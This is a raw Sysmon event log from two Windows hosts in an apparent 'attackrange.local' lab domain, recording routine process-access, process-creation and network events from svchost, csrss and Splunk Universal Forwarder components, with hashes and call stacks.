07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806647Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806646Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806645Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806644Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F38C-60EB-5179-00000000D001}3620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806643Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38C-60EB-5179-00000000D001}3620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806642Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.910{0C1E0330-F38C-60EB-5179-00000000D001}3620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000806641Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.394{0C1E0330-F38C-60EB-5079-00000000D001}4163280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806640Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F6A9EF61298A631E24A9F6CC9BE12FF,SHA256=B0E493AD94B52151E657BDA5D83DD1862D54EEE8A4D9FB396E357B5616AA3BB1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:15.643{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50953-false10.0.1.12-8000- 10341000x8000000000000000806639Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38C-60EB-5079-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806638Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806637Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806636Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806635Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806634Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806633Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806632Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806631Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806630Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806629Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F38C-60EB-5079-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806628Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38C-60EB-5079-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806627Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.222{0C1E0330-F38C-60EB-5079-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:25.935{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B95F4C1CCA7DCE879EF3EA0FFDDE9319,SHA256=4A18040E0336479AF79439CBC487FA3DF3317D3C7CA018FFBFB2F0BF29922B95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:25.784{0C1E0330-F38D-60EB-5279-00000000D001}2688764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.628{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38D-60EB-5279-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806668Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806667Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
